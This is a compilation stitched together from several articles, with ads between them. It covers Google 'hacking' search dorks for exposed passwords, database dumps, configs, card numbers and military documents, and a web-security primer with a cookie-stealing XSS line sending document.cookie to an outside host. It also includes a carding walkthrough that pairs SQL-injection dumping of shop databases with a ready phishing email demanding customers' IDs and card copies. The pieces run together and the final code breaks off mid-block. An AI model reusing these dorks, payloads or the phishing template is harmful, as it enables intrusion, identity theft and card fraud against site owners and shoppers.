Using Little-Known Google Features to Find Hidden Information


The Google search engine (www.google.com) provides many search options. All these capabilities are an invaluable search tool for a first-time Internet user and, at the same time, an even more powerful weapon of invasion and destruction in the hands of people with evil intentions, including not only hackers, but also non-computer criminals and even terrorists.

Denis Batrankov
denisNOSPAMixi.ru

Attention: this article is not a how-to guide. It is written for you, web server administrators, so that you lose the false sense of security, finally understand how insidious this method of gathering information is, and get down to protecting your site.

Introduction

For example, I found 1670 pages in 0.14 seconds!

2. Let's enter another query, for example:

inurl:"auth_user_file.txt"

Google returns somewhat fewer results, but they are already enough both for downloading the files and for brute-forcing the passwords in them (for example, with John the Ripper). More examples follow below.

So, you need to realize that Google has visited most of the sites on the Internet and cached the information they contain. This cached information lets you learn about a site and its contents without connecting to it directly, just by digging through what Google stores internally. Moreover, if the information on a site is no longer available, the copy in the cache may still be preserved. All this method takes is knowing some Google keywords. This technique is called Google Hacking.

Information about Google Hacking first appeared on the Bugtraq mailing list three years ago, in November 2001, when the topic was raised by a French student. Here is a link to that letter: http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. It gives the first examples of such queries:

1) Index of /admin
2) Index of /password
3) Index of /mail
4) Index of / +banques +filetype:xls (for France...)
5) Index of / +passwd
6) Index of /password.txt

This topic made a splash in the English-speaking part of the Internet quite recently, after Johnny Long's article published on May 7, 2004. For a more complete study of Google Hacking, I recommend visiting the author's site http://johnny.ihackstuff.com. In this article, I just want to bring you up to date.

Who can use it:
- Journalists, spies, and all those who like to poke their nose into other people's business can use it to search for compromising material.
- Hackers looking for suitable targets to attack.

How Google works.

To continue the conversation, let me remind you of some of the keywords used in Google queries.

Search using the + sign

Google excludes words it considers unimportant from the search: question words, prepositions, and articles in English, such as are, of, where. In Russian, Google seems to treat all words as important. When a word is dropped from the search, Google reports it. To make Google search for pages that do contain such words, add a + sign immediately before the word, with no space. For instance:

ace +of base

Search using the - sign

If Google finds a large number of pages and you need to exclude those on a particular topic, you can force Google to look only for pages that do not contain certain words. To do this, put a - sign immediately before each such word, with no space. For instance:

fishing -vodka

Search using ~

You may want to find not only the specified word, but also its synonyms. To do this, precede the word with the ~ symbol.

Finding the exact phrase using double quotes

Google searches each page for all occurrences of the words you wrote in the query string; it does not care about the relative position of the words, the main thing being that all the specified words appear on the page at the same time (this is the default behavior). To find an exact phrase, you need to enclose it in quotes. For instance:

"bookend"

To require at least one of several specified words, you need to state the logical operation explicitly: OR. For instance:

book safety OR protection

In addition, in the search bar you can use the * sign to stand for any word and the . sign to stand for any character.

Finding words using additional operators

There are search operators that are specified in the search string in the format:

operator: search_term

No spaces are needed around the colon. If you insert a space after the colon, you will see an error message; if you insert one before it, Google will treat the operator as an ordinary search word.
There are groups of additional search operators: languages (indicate in which language you want to see the result), date (limit results to the past three, six, or twelve months), occurrences (indicate where in the document to search for the string: everywhere, in the title, in the URL), domains (search only the specified site or, on the contrary, exclude it from the search), safe search (block sites containing the specified type of information and remove them from the search results pages).
At the same time, some operators do not need an additional parameter; for example, the query "cache:www.google.com" can serve as a full-fledged search string by itself, while some keywords, on the contrary, require a search word, as in "site:www.google.com help". In light of our topic, let's look at the following operators:

Operator       Description                                                        Requires an additional parameter?

site:          search only on the site specified in search_term                   yes
filetype:      search only in documents of the type search_term                   yes
intitle:       find pages containing search_term in the title                     yes
allintitle:    find pages containing all the words of search_term in the title    yes
inurl:         find pages containing search_term in their URL                     yes
allinurl:      find pages containing all the words of search_term in their URL    yes

Operator site: restricts the search to the specified site only; you can specify not only a domain name but also an IP address.

Operator filetype: restricts the search to files of a specific type.

As of the article's release date, Google can search within 13 different file formats:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich Text Format (rtf)
  • Shockwave Flash (swf)
  • Text (ans, txt)

Operator link: shows all pages that point to the specified page.
It is probably always interesting to see how many places on the Internet know about you; try this operator on your own site.

Operator cache: shows the version of a page in Google's cache as it looked when Google last visited it. Take any frequently changing site and look.

Operator intitle: searches for the specified word in the page title. Operator allintitle: is an extension: it requires all of the listed words to appear in the page title. Compare:

intitle:flight to mars
intitle:flight intitle:to intitle:mars
allintitle:flight to mars

Operator inurl: makes Google show all pages containing the specified string in their URL. Operator allinurl: searches for all of the words in the URL. For instance:

allinurl:acid acid_stat_alerts.php

This query is especially useful for those who do not have SNORT: at least they can see how its ACID console works on a real system.

Hacking Methods Using Google

So, we have found out that, by combining the operators and keywords above, anyone can gather the necessary information and search for vulnerabilities. These techniques are often referred to as Google Hacking.

Site map

You can use the site: operator to see all the links Google has found on a site. Pages generated dynamically by scripts are usually not indexed when parameters are used, so some sites install ISAPI filters so that links take the form /article/abc/num/10/dst/5 with slashes instead of /article.asp?num=10&dst=5. This is done so that the site is indexed by search engines at all.

Let's try:

site:www.whitehouse.gov whitehouse

Google assumes that every page on the site contains the word whitehouse, and that is what we use to get all of the pages.
There is also a simplified version:

site:whitehouse.gov

And the best part is that the folks at whitehouse.gov never learned that we looked at the structure of their site and even peeked into the cached pages that Google downloaded for itself. This can be used to study the structure of sites and view their content while remaining unnoticed, at least for the time being.

Viewing a list of files in directories

WEB servers can display directory listings instead of regular HTML pages. This is usually done so that users can select and download specific files. In many cases, however, administrators have no intention of showing a directory's contents; it happens because of server misconfiguration or because the directory lacks an index page. As a result, a hacker has a chance to find something interesting in such a directory and use it for his own purposes. To find all such pages, note that they all contain the words index of in their title. But since pages containing index of are not only listings, the query needs to be refined with keywords from the page body, so queries like these will do:

intitle:index.of parent directory
intitle:index.of name size

Since most directory listings are exposed intentionally, you may find it hard to locate accidentally exposed listings on the first try. But at the very least you can already use the listings to determine the version of the WEB server, as described below.

Getting the version of the WEB server.

Knowing the version of the WEB server is always useful before starting any attack. Once again, thanks to Google, you can get this information without connecting to the server: if you look closely at a directory listing, you can see that the name of the WEB server and its version are printed there.

Apache/1.3.29 (ProXad) Server at trf296.free.fr Port 80

An experienced administrator can change this line, but as a rule it is accurate. Thus, to get this information, it is enough to send the query:

intitle:index.of server.at

To get the information for a specific server, we refine the query:

intitle:index.of server.at site:ibm.com

Or, conversely, we look for servers running a specific version:

intitle:index.of Apache/2.0.40 Server at

A hacker can use this technique to find a victim. If, for example, he has an exploit for a certain version of the WEB server, he can find servers of that version and try the exploit on them.

You can also learn the server version by looking at the pages that are installed by default with a fresh WEB server installation. For example, to see the Apache 1.2.6 test page, just type:

intitle:Test.Page.for.Apache it.worked!

Moreover, some operating systems install and start a WEB server during OS installation, and some users are not even aware of it. Naturally, if you see that someone has not removed the default page, it is logical to assume that the computer has not been configured at all and is probably vulnerable to attack.

Try to find IIS 5.0 pages:

allintitle:Welcome to Windows 2000 Internet Services

In the case of IIS, you can determine not only the server version, but also the Windows version and Service Pack.

Another way to determine the version of the WEB server is to look for the manuals (help pages) and examples that may be installed on a site by default. Hackers have found quite a few ways to use these components to gain privileged access to a site. That is why you should remove them from a production site. Not to mention that their mere presence reveals the type of server and its version. For example, let's find the Apache manual:

inurl:manual apache directives modules

Using Google as a CGI scanner.

A CGI scanner (WEB scanner) is a utility that searches for vulnerable scripts and programs on the victim's server. To know what to look for, these utilities carry a whole list of vulnerable files, for example (a sketch of such a scanner follows the list):

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi
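
As promised, here is a minimal Python sketch of what such a scanner does. The host name and the use of the third-party requests library are my own assumptions for illustration; the paths are taken from the list above.

import requests  # third-party library: pip install requests

# A few of the known-vulnerable paths listed above
KNOWN_PATHS = [
    "/cgi-bin/cgiemail/uargg.txt",
    "/random_banner/index.cgi",
    "/cgi-bin/mailview.cgi",
    "/scripts/cphost.dll",
]

def scan(host):
    # Request each path and report the ones that actually exist
    for path in KNOWN_PATHS:
        url = "http://" + host + path
        try:
            response = requests.get(url, timeout=5)
            if response.status_code == 200:
                print("found:", url)
        except requests.RequestException:
            pass  # host down, timeout, and so on

# scan("example.com")  # only scan hosts you are authorized to test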

We can find each of these files with Google by adding the words index of or inurl to the file name in the search bar. For example:

allinurl:/random_banner/index.cgi

With some additional knowledge, a hacker can exploit a vulnerability in such a script and force it to return any file stored on the server, for example the password file.

How to protect yourself from Google hacking.

1. Do not post important data to the WEB server.

Even if you posted the data temporarily, you may forget about it, or someone may manage to find and take it before you erase it. Don't do it. There are many other ways to transfer data that protect it from theft.

2. Check your site.

Use the methods described above to research your own site. Check your site periodically against the new methods that appear on http://johnny.ihackstuff.com. Remember that if you want to automate your checks, you need special permission from Google. If you read http://www.google.com/terms_of_service.html carefully, you will see the phrase: You may not send automated queries of any sort to Google's system without express permission in advance from Google.

3. You may not need Google to index your site or part of it.

Google allows you to remove a link to your site, or part of it, from its database, as well as remove pages from the cache. In addition, you can prohibit image search on your site and prohibit showing short page fragments in search results. All the options for removing a site are described at http://www.google.com/remove.html. To use them, you must confirm that you really are the owner of the site, or insert the appropriate meta tags into the pages.

4. Use robots.txt

Search engines are known to look into the robots.txt file in the site root and to skip the parts marked with the word Disallow. You can take advantage of this to keep part of a site from being indexed. For example, to keep the entire site out of the index, create a robots.txt file containing two lines:

User-agent: *
Disallow: /
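
To keep only selected directories out of the index while leaving the rest of the site crawlable, list them separately (the directory names below are made up for illustration):

User-agent: *
Disallow: /admin/
Disallow: /backup/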

What else happens

So that life does not seem too sweet, I will say in closing that there are sites that watch the people who use the methods described above to look for holes in scripts and WEB servers. An example of such a page is

Appendix.

And now a little something sweet. Try some of the following queries yourself:

1. #mysql dump filetype:sql - find dumps of MySQL databases
2. Host Vulnerability Summary Report - vulnerability reports that other people have already compiled for you
3. phpMyAdmin running on inurl:main.php - phpMyAdmin installations with management left wide open
4. not for distribution confidential
5. Request Details Control Tree Server Variables
6. Running in Child mode
7. This report was generated by WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs - who might need firewall configuration files? :)
10. intitle:index.of finances.xls - hmm....
11. intitle:Index of dbconvert.exe chats - ICQ chat logs
12. intext:Tobias Oetiker traffic analysis
13. intitle:Usage Statistics for Generated by Webalizer
14. intitle:statistics of advanced web statistics
15. intitle:index.of ws_ftp.ini - WS_FTP configuration
16. inurl:ipsec.secrets holds shared secrets - a secret key is a good find
17. inurl:main.php Welcome to phpMyAdmin
18. inurl:server-info Apache Server Information
19. site:edu admin grades
20. ORA-00921: unexpected end of SQL command - getting paths
21. intitle:index.of trillian.ini
22. intitle:Index of pwd.db
23. intitle:index.of people.lst
24. intitle:index.of master.passwd
25. inurl:passlist.txt
26. intitle:Index of .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30. intitle:index.of secring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

  • "Hacking mit Google"
  • Training Center "Informzashita" http://www.itsecurity.ru - a leading specialized center in the field of information security training (License of the Moscow Education Committee No. 015470, State accreditation No. 004251). The only authorized training center for Internet Security Systems and Clearswift in Russia and the CIS. Microsoft Authorized Training Center (Security specialization). The training programs are coordinated with the State Technical Commission of Russia, the FSB (FAPSI). Certificates of training and state documents on professional development.

    SoftKey is a unique service for buyers, developers, dealers and affiliate partners. In addition, this is one of the best online software stores in Russia, Ukraine, Kazakhstan, which offers customers a wide assortment, many payment methods, prompt (often instant) order processing, tracking the order fulfillment process in the personal section, various discounts from the store and manufacturers ON.

    I decided to talk a little about information security. This article will be useful for novice programmers and those who are just starting out in frontend development. What is the problem?

    Many novice developers get so carried away with writing code that they completely forget about the security of their work. Above all, they forget about vulnerabilities such as SQL injection and XSS. They also invent weak passwords for their admin panels and get brute-forced. What are these attacks and how can they be avoided?

    SQL injection

    SQL injection is the most common type of attack on databases, carried out through an SQL query to a specific DBMS. Many people and even large companies suffer from such attacks. The cause is a developer's mistake in designing the database and, specifically, in writing the SQL queries.

    An SQL injection attack becomes possible because input data used in SQL queries is processed incorrectly. If a hacker pulls off an attack, you risk losing not only the contents of your databases but also the passwords and logins of the administrative panel. And that data is quite enough to completely take over a site or make irreversible changes to it.
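
    To make the mistake concrete, here is a minimal, self-contained sketch in Python (using the built-in sqlite3 module; the table and the values are invented for illustration). The first query glues user input into the SQL text and is injectable; the second passes the input as a parameter and is not:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])

    user_input = "1 OR 1=1"  # attacker-controlled value, e.g. from page.php?id=

    # Vulnerable: the input becomes part of the SQL text itself
    rows = conn.execute("SELECT name FROM users WHERE id = " + user_input).fetchall()
    print(rows)  # [('alice',), ('bob',)] - the condition matched every row

    # Safe: the input is passed as data and is never parsed as SQL
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_input,)).fetchall()
    print(rows)  # [] - no row has the literal id '1 OR 1=1'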

    The attack can be carried out against scripts written in PHP, ASP, Perl, and other languages. Its success depends largely on which DBMS is used and on how the script itself is implemented. There are a great many sites in the world vulnerable to SQL injection, and this is easy to verify: it is enough to enter "dorks", special queries for finding vulnerable sites. Here are some of them:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    How to use them? Just enter them into Google or Yandex. The search engine will return not only a vulnerable site but also the exact page with the vulnerability. But we will not stop there; let's make sure the page really is vulnerable. To do this, it is enough to put a single quote ' after the value id=1. Something like this:

    • inurl:games.php?id=1'

    And the site will give us an error about the SQL query. What does our hacker need next?

    He needs that very link to the error page. Then, in most cases, the work on the vulnerability is done in the Kali Linux distribution with its utilities for this purpose: injecting the code and performing the necessary operations. I cannot tell you how exactly that happens, but you can find information about it on the Internet.

    XSS Attack

    This type of attack targets cookies, which users are very fond of saving. And why not? What would we do without them? Indeed, thanks to cookies, we do not have to type the password for Vk.com or Mail.ru a hundred times. And few people refuse them. But on the Internet a rule often plays into hackers' hands: the convenience factor is directly proportional to the insecurity factor.

    To carry out an XSS attack, our hacker needs a knowledge of JavaScript. At first glance, the language is very simple and harmless, because it has no access to the computer's resources: a hacker can work with JavaScript only inside the browser. But that is enough, because the main thing is to get the code into the web page.

    I will not describe the attack process in detail; I will only give the basics and the meaning of how it happens.

    A hacker can add JS code to a forum or guestbook:

    The script will redirect us to an infected page where some code will be executed: a sniffer, some kind of storage, or an exploit that will one way or another steal our cookies from the cache.

    Why JavaScript? Because JavaScript works well with web requests and has access to cookies. But if our script redirects the user to some other site, he will easily notice it. Here the hacker uses a more cunning option: he simply writes the code into a picture.

    img = new Image();
    img.src = "http://192.168.1.7/sniff.php?" + document.cookie;

    We simply create an image object and assign our script's address to it.

    How to protect yourself from all this? Very simple: do not click suspicious links.
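
    That is the advice for users. On the server side, the usual defense (a sketch under the assumption that user comments are rendered into HTML) is to escape markup before output, so that a planted script arrives as harmless text. In Python:

    import html

    comment = '<script>img = new Image(); img.src = "http://evil.example/?" + document.cookie;</script>'

    safe = html.escape(comment)  # < > & " ' become HTML entities
    print(safe)  # &lt;script&gt;... - the browser displays this as text instead of executing it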

    DoS and DDoS Attacks


    DoS (from the English Denial of Service) is a hacker attack on a computer system aimed at bringing it to failure: creating conditions under which legitimate users of the system cannot access the system's resources (servers), or can do so only with difficulty. The failure of a system can also be a step toward taking it over, if in an emergency the software gives out any critical information: for example, a version number or part of the program code. But most often it is a measure of economic pressure: the downtime of a revenue-generating service, the provider's bills, and the measures taken to fend off the attack hit the target noticeably in the wallet. Currently, DoS and DDoS attacks are the most popular, since they allow almost any system to be brought to failure without leaving legally significant evidence.

    What is the difference between DoS and DDoS attacks?

    DoS is a cleverly constructed attack. For example, if a server does not check the correctness of incoming packets, a hacker can craft a request that will take forever to process, leaving no processor time for other connections. Clients will accordingly be denied service. But it will not work to overload or disable large, well-known sites this way: they are armed with fairly wide channels and super-powerful servers that cope with such a load without any problem.

    DDoS is essentially the same attack as DoS. But where DoS uses a single request packet, DDoS may use hundreds or more of them. Even super-powerful servers may not cope with such an overload. Let me give you an example.

    A DoS attack is when you are having a conversation with someone, but then some ill-mannered person walks up and starts shouting loudly. Talking becomes either impossible or very difficult. The solution: call security, who will calm the person down and lead him out of the room. A DDoS attack is when a crowd of thousands of such ill-mannered people rushes in. In that case, the guards will not be able to restrain and remove them all.

    DoS and DDoS attacks are launched from computers called zombies. These are users' machines hacked by the attackers; their owners do not even suspect that they are participating in an attack on a server.

    How to protect yourself from this? In general, you cannot. But you can make the hacker's task harder. To do this, choose good hosting with powerful servers.

    Brute-force attack

    A developer can build many systems of protection against attacks, fully review the scripts we have written, check the site for vulnerabilities, and so on. But at the last step of assembling the site, namely when setting a password on the admin panel, he may forget about one thing. The password!

    Setting a simple password is strongly discouraged: 12345, 1114457, vasya111, and the like. Do not set passwords shorter than 10-11 characters. Otherwise, you expose yourself to the most common and least sophisticated attack: brute force.

    Brute force is a dictionary-based password-guessing attack carried out by special programs. Dictionaries can differ: Latin characters, digit sequences up to a certain range, mixed sets (Latin plus digits), and there are even dictionaries of special symbols such as @#4$%&*~`'"\? and so on.

    Of course, this type of attack is easy to avoid by creating a complex password. Even a captcha can save you. Also, if your site is built on a CMS, many of them detect this type of attack and block the offending IP. You must always remember: the more distinct characters a password contains, the harder it is to guess.

    How do hackers work? In most cases, they either suspect or know part of the password beforehand. It is quite logical to assume that a user's password will certainly not consist of 3 or 5 characters; such passwords lead to frequent break-ins. So hackers take a range of 5 to 10 characters and add the few characters they probably know in advance. Then passwords with the required ranges are generated; the Kali Linux distribution even includes programs for such cases. And voila, the attack no longer takes long, since the dictionary volume is no longer that large. In addition, a hacker can harness the power of a video card: some of them support CUDA, raising the search speed as much as 10-fold. So we see that an attack this simple is quite real. And it is not only sites that get brute-forced.
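
    A minimal Python sketch of that mask idea (the known prefix and the character set here are invented for illustration); it also shows why every extra character multiplies the work:

    import itertools
    import string

    charset = string.ascii_lowercase + string.digits  # 36 possible symbols
    known_prefix = "vasya"  # the part the attacker already guesses
    suffix_length = 3

    # The number of candidates grows as len(charset) ** suffix_length
    print(len(charset) ** suffix_length)  # 46656; one more character makes it 1679616

    def candidates():
        for combo in itertools.product(charset, repeat=suffix_length):
            yield known_prefix + "".join(combo)

    # Each candidate would then be tried against a login form or a stolen hash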

    Dear developers, never forget about information security, because today many people, and even entire states, suffer from such attacks. After all, the greatest vulnerability is the human being, who can always be distracted or overlook something. We are programmers, not programmed machines. Always be on the alert, because the loss of information threatens serious consequences!

    How to search correctly with google.com

    Everyone probably knows how to use a search engine like Google =) But not everyone knows that if you compose a search query correctly, using special constructions, you can achieve what you are looking for much more efficiently and quickly =) In this article I will try to show what you need to do, and how, in order to search correctly.

    Google supports several advanced search operators that have special meaning when searching on google.com. Typically, these operators modify the search, or even tell Google to perform a completely different type of search. For example, the construction link: is a special operator, and the query link:www.google.com will not run a normal search but will instead find all web pages that link to google.com.
    Alternative query types

    cache: shows the version of a web page from Google's cache. If you include other words in the query, Google will highlight them within the cached document.
    For instance, cache:www.site web will show the cached content with the word "web" highlighted.

    link: the query discussed above shows web pages that contain links to the specified address.
    For instance: link:www.site will display all pages that link to http://www.site

    related: displays web pages that are "related" to the specified web page.
    For instance, related:www.google.com will list web pages that are similar to Google's home page.

    info: provides some of the information that Google has about the requested web page.
    For instance, info:website will show information about our forum =) (Armada - a forum for adult webmasters).

    Other information queries

    define: the define: query will provide a definition of the words you enter after it, compiled from various online sources. The definition will cover the entire phrase entered (that is, it will include all the words of the exact query).

    stocks: if you start your query with stocks:, Google will treat the rest of the query terms as stock ticker symbols and will link to a page showing ready-made information for those symbols.
    For instance, stocks:intc yhoo will show information about Intel and Yahoo. (Note that you must type the ticker symbols, not the company name.)

    Query modifiers

    site: if you include site: in your query, Google will limit the results to the websites it finds in that domain.
    You can also search individual zones, such as ru, org, com, etc. (site:com site:ru)

    allintitle: if you run a query with allintitle:, Google will limit the results to documents that contain all the words of the query in the title.
    For instance, allintitle:google search will return all of Google's own search pages, such as Images, Blog, etc.

    intitle: if you include intitle: in your query, Google will limit the results to documents containing that word in the title.
    For instance, intitle:Business

    allinurl: if you run a query with allinurl:, Google will limit the results to documents containing all the words of the query in the URL.
    For instance, allinurl:google search will return documents with google and search in the URL. Also, as an option, you can separate words with a slash (/); then the words on both sides of the slash will be searched within the same page: for example allinurl:foo/bar

    inurl: if you include inurl: in your query, Google will limit the results to documents containing that word in the URL.
    For instance, Animation inurl:site

    intext: searches only the text of the page for the specified word, ignoring the title, link text, and everything else unrelated to the body. There is also a derivative of this modifier, allintext:, meaning that all further words in the query will be searched only in the text, which again ignores the words frequently used in links.
    For instance, intext:forum

    daterange: searches within a time frame (daterange:2452389-2452389); the dates are specified in Julian format.

    And now, all sorts of interesting example queries

    Examples of writing queries for Google. For spammers

    inurl:control.guest?a=sign

    site:books.dreambook.com "Homepage URL" "Sign my" inurl:sign

    site:www.freegb.net Homepage

    inurl:sign.asp "Character Count"

    "Message:" inurl:sign.cfm "Sender:"

    inurl:register.php "User Registration" "Website"

    inurl:edu/guestbook "Sign the Guestbook"

    inurl:post "Post Comment" "URL"

    inurl:/archives/ "Comments:" "Remember info?"

    "Script and Guestbook Created by:" "URL:" "Comments:"

    inurl:?action=add "phpBook" "URL"

    intitle:"Submit New Story"

    Journals

    inurl:www.livejournal.com/users/ mode=reply

    inurl:greatestjournal.com/ mode=reply

    inurl:fastbb.ru/re.pl?

    inurl:fastbb.ru/re.pl? "Guest book"

    Blogs

    inurl:blogger.com/comment.g? "postID" "anonymous"

    inurl:typepad.com/ "Post a comment" "Remember personal info?"

    inurl:greatestjournal.com/community/ "Post comment" "addresses of anonymous posters"

    "Post comment" "addresses of anonymous posters" -

    intitle:"Post comment"

    inurl:pirillo.com "Post comment"

    Forums

    inurl:gate.html? "name=Forums" "mode=reply"

    inurl:"forum/posting.php?mode=reply"

    inurl:"mes.php?"

    inurl:"members.html"

    inurl:"forum/memberlist.php?"

    [Prologue]

    I think each of us has tried to get hold of credit cards on his own; I am no exception. The main method is to dump an online store's database through SQL injection.

    [Parsing]

    It all starts with parsing links. Personally, I used a parser of my own; you can use open-source software. Note that you should not just use a bare query like

    inurl:product.php?id=

    you need something like this:

    inurl:"product.php?id=" buy iphone

    or even like this:

    inurl:"*shop.com" inurl:".php?id=" dress

    The quotation marks play a big role here. Here are a few sample dorks:

    inurl:buy.php?category=
    inurl:gallery.php?id=
    inurl:event.php?id=
    inurl:view_product.php?id=
    inurl:product.php?id=
    inurl:products.php?id=
    inurl:shop.php?id=
    inurl:collectionitem.php?id=
    inurl:shopping.php?id=
    inurl:items.php?id=

    And now we have a couple of thousand links!

    [Checking for SQL injection. Dumping the DB]

    That's it, we have parsed our million links. Now the checking begins. Here I used a checker of my own; you can use publicly available software...

    Here it is...

    We have collected the vulnerable links and begin dumping. Personally, I use Havij first. If it cannot cope, and that happens in 50% of cases, I work by hand. And there it is!!! We come across a table with the name

    We open it, and..... there are no columns with credit cards. Eh...

    [CC where there is none]

    Yes, we did not find a column with CC, which is sad. 99% of carders would write such a shop off and move on. Take your time. We have on hand all the shop's orders: the customers' names, surnames, addresses, and order dates. Now let's remember what usually happens when we pay with a CC? Right, we are asked for a photo of our documents and of the credit card...

    [Now WE ARE THE SHOP!]

    We dump the following from the table:

    FName LName order date email

    Of course, the column names may differ.

    Now we have everything we need. We register an email address on hotmail.com. We are now ready. We start spamming...

    Sample text of the letter:

    Dear FName LName, We are processing your order. As part of our security procedures, we ask that you provide the following documents: 1) Your valid photo identification (e.g. passport or driving license). 2) An utility bill or bank statement issued on your name, that shows your current address. Please note that such can only be accepted if it’s dated no longer than 3 months back from the current date. 3) Copy of your credit card (front and back side). Once your ID and utility bill are verified, they will be placed in a secure file and you will not be asked to re-send it in the future. Send your documents at e-mail to Please note, if after 2 days, we do not receive legible e-mail, we will cancel your order.


    # The tests were carried out on Indian shops. The response rate was approximately 40%.
    # All documents obtained in this way were erased, and the shops were notified of the vulnerability.
    # The article was written for informational purposes only. In no way am I encouraging you to take such actions.

    Getting private data does not always mean hacking; sometimes it is published in the open. Knowing Google's settings and a little ingenuity will let you find a lot of interesting things, from credit card numbers to FBI documents.

    WARNING

    All information is provided for informational purposes only. Neither the editors nor the author is responsible for any possible harm caused by the materials of this article.

    Today, everything is connected to the Internet, with little concern for restricting access. Therefore, a lot of private data becomes prey for search engines. Spider robots are no longer limited to web pages; they index all the content available on the Web and constantly add non-public information to their databases. Finding out these secrets is easy: you just need to know exactly how to ask about them.

    Looking for files

    In the right hands, Google will quickly find everything that is lying around loose on the Web, for example, personal information and files for internal use. They are often hidden like a key under a doormat: there are no real access restrictions, the data simply sits on the back pages of the site, where no links lead. Google's standard web interface provides only basic advanced search settings, but even those will suffice.

    You can limit your Google search to specific file types using two operators: filetype and ext. The first specifies the format that the search engine determined from the file header, the second the file extension, regardless of the file's internal content. In both cases, you only need to specify the extension. Initially, the ext operator was convenient in cases where the file lacked specific format features (for example, when searching for ini and cfg configuration files, which can contain just about anything). Google's algorithms have since changed, and there is no visible difference between the operators: in most cases, the results come out the same.


    Filtering the results

    By default, Google searches for words, and in general any entered characters, in all the files on indexed pages. You can limit the search scope by top-level domain or specific site, or by the location of the desired sequence within the files themselves. For the first two options, the operator site is used, followed by the name of the domain or of the selected site. In the third case, a whole set of operators lets you search for information in service fields and metadata. For example, allinurl finds the given text in the body of the links themselves, allinanchor in the text marked with the <a> tag, allintitle in page titles, allintext in the body of pages.

    For each of these operators there is a lighter version with a shorter name (without the all prefix). The difference is that allinurl finds links containing all the words, while inurl requires only the first word to appear in the link; the second and subsequent words of the query can appear anywhere on the page. The inurl operator also differs from another operator with a similar meaning, site: the former lets you find any sequence of characters in a link to the searched document (for example, /cgi-bin/), which is widely used for finding components with known vulnerabilities.

    Let's try it in practice. We take the allintext filter and make the query return a list of credit card numbers and verification codes that will expire only in two years (or when their owners get tired of feeding everyone in a row).

    allintext:card number expiration date /2017 cvv

    When you read in the news that a young hacker "hacked the servers" of the Pentagon or NASA and stole classified information, in most cases it is precisely this elementary technique of using Google. Suppose we are interested in a list of NASA employees and their contact details. Surely such a list exists in electronic form. For convenience, or through oversight, it may also lie on the organization's own website. It is logical that there will be no links to it, since it is intended for internal use. What words can be in such a file? At a minimum, the "address" field. Testing all these assumptions is easy.

    inurl:nasa.gov filetype:xlsx "address"


    We use bureaucracy

    Finds like these are just a nice touch. A really solid catch comes from a more detailed knowledge of Google's operators for webmasters, of the Web itself, and of the structure of what you are looking for. Knowing the details, you can easily filter the results and refine the properties of the files you need, so that what remains is truly valuable data. It is funny that bureaucracy comes to the rescue here: it produces standard formulations that make it convenient to search for secrets accidentally leaked onto the Web.

    For example, the Distribution statement stamp, which is mandatory in the paperwork of the US Department of Defense, denotes standardized restrictions on the distribution of a document. The letter A marks public releases in which there is nothing secret; B means for internal use only; C means strictly confidential; and so on up to F. The letter X stands apart, marking especially valuable information that constitutes a state secret of the highest level. Let those whose duty it is search for such documents; we will confine ourselves to files with the letter C. According to directive DoDI 5230.24, this marking is assigned to documents containing descriptions of critical technologies that fall under export control. Such carefully guarded information can be found on sites in the .mil top-level domain, allotted to the US Army.

    "DISTRIBUTION STATEMENT C" inurl:navy.mil

    It is very convenient that the .mil domain contains only sites of the US Department of Defense and its contract organizations. Domain-restricted search results are exceptionally clean, and the titles speak for themselves. Searching for Russian secrets in this way is practically useless: chaos reigns in the .ru and .rf domains, and the names of many weapons systems sound botanical (the PP "Cypress", the ACS "Akatsiya") or downright fabulous (the TOS "Buratino").


    By carefully studying any document from a site in the .mil domain, you can spot other markers to refine your search. For example, the reference to the export restrictions "Sec 2751", which is also convenient for finding interesting technical information. From time to time such documents are pulled from the official sites where they once appeared, so if you cannot follow an interesting link in the search results, use Google's cache (the cache operator) or the Internet Archive.

    Climbing into the clouds

    In addition to accidentally declassified government documents, links to personal files from Dropbox and other data storage services occasionally pop up in Google's cache, since these services create "private" links to publicly published data. It is even worse with alternative and home-grown services. For example, the following query finds the data of all Verizon customers who have an FTP server installed on their router and actively in use.

    allinurl:ftp:// verizon.net

    There are now more than forty thousand such clever people, and in the spring of 2015 there were an order of magnitude more. Instead of verizon.net, you can substitute the name of any well-known provider, and the better known it is, the bigger the catch can be. Through the built-in FTP server, you can see the files on the external storage connected to the router. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer file downloader. All the contents of such media are indexed by Google and other search engines, so files stored on external drives can be accessed via a direct link.

    Peeking at configs

    Before the widespread migration to the clouds, simple FTP servers, which also had plenty of vulnerabilities, ruled as remote storage. Many of them are still relevant today. For example, the popular WS_FTP Professional program stores its configuration data, user accounts, and passwords in the ws_ftp.ini file. It is easy to find and read, since all records are saved in text form, and the passwords are encrypted with Triple DES after minimal obfuscation. In most versions, it is enough to simply discard the first byte.

    Such passwords are easy to decrypt using the WS_FTP Password Decryptor utility or a free web service.
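
    A minimal Python sketch of pulling the account records out of such a file (the HOST/UID/PWD field names follow the ws_ftp.ini layout described above; the file name is an assumption):

    record = {}
    for line in open("ws_ftp.ini", encoding="latin-1"):
        key, _, value = line.strip().partition("=")
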